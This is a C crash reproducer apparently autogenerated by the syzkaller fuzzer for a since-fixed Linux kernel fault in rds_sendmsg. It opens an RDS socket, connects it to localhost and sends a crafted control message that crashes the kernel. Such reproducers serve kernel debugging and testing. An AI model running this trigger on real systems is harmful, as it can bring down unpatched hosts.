| // general protection fault in rds_sendmsg |
| // https://syzkaller.appspot.com/bug?id=7b2aa6e2863f04d9d634332be08848742266a4e8 |
| // status:fixed |
| // autogenerated by syzkaller (http://github.com/google/syzkaller) |
| |
| #define _GNU_SOURCE |
| #include <endian.h> |
| #include <stdint.h> |
| #include <string.h> |
| #include <sys/syscall.h> |
| #include <unistd.h> |
| |
| long r[1]; |
| void loop() |
| { |
| memset(r, -1, sizeof(r)); |
| r[0] = syscall(__NR_socket, 0x15, 5, 0); |
| *(uint16_t*)0x2001bff0 = 2; |
| *(uint16_t*)0x2001bff2 = 0; |
| *(uint32_t*)0x2001bff4 = htobe32(0x7f000001); |
| *(uint8_t*)0x2001bff8 = 0; |
| *(uint8_t*)0x2001bff9 = 0; |
| *(uint8_t*)0x2001bffa = 0; |
| *(uint8_t*)0x2001bffb = 0; |
| *(uint8_t*)0x2001bffc = 0; |
| *(uint8_t*)0x2001bffd = 0; |
| *(uint8_t*)0x2001bffe = 0; |
| *(uint8_t*)0x2001bfff = 0; |
| syscall(__NR_bind, r[0], 0x2001bff0, 0x10); |
| *(uint16_t*)0x20024ff0 = 2; |
| *(uint16_t*)0x20024ff2 = 0; |
| *(uint32_t*)0x20024ff4 = htobe32(0x7f000001); |
| *(uint8_t*)0x20024ff8 = 0; |
| *(uint8_t*)0x20024ff9 = 0; |
| *(uint8_t*)0x20024ffa = 0; |
| *(uint8_t*)0x20024ffb = 0; |
| *(uint8_t*)0x20024ffc = 0; |
| *(uint8_t*)0x20024ffd = 0; |
| *(uint8_t*)0x20024ffe = 0; |
| *(uint8_t*)0x20024fff = 0; |
| syscall(__NR_connect, r[0], 0x20024ff0, 0x10); |
| *(uint64_t*)0x20000300 = 0; |
| *(uint32_t*)0x20000308 = 0; |
| *(uint64_t*)0x20000310 = 0x20000000; |
| *(uint64_t*)0x20000318 = 0; |
| *(uint64_t*)0x20000320 = 0x200002c0; |
| *(uint64_t*)0x200002c0 = 0x20; |
| *(uint32_t*)0x200002c8 = 0x114; |
| *(uint32_t*)0x200002cc = 0xc; |
| memcpy((void*)0x200002d0, |
| "\xab\x97\x1c\x3f\x1a\x01\xa3\xbd\xa4\xa1\x03\x1d\x3d\x93", 14); |
| *(uint64_t*)0x20000328 = 0x20; |
| *(uint32_t*)0x20000330 = 0; |
| syscall(__NR_sendmsg, r[0], 0x20000300, 0); |
| } |
| |
| int main() |
| { |
| syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0); |
| loop(); |
| return 0; |
| } |
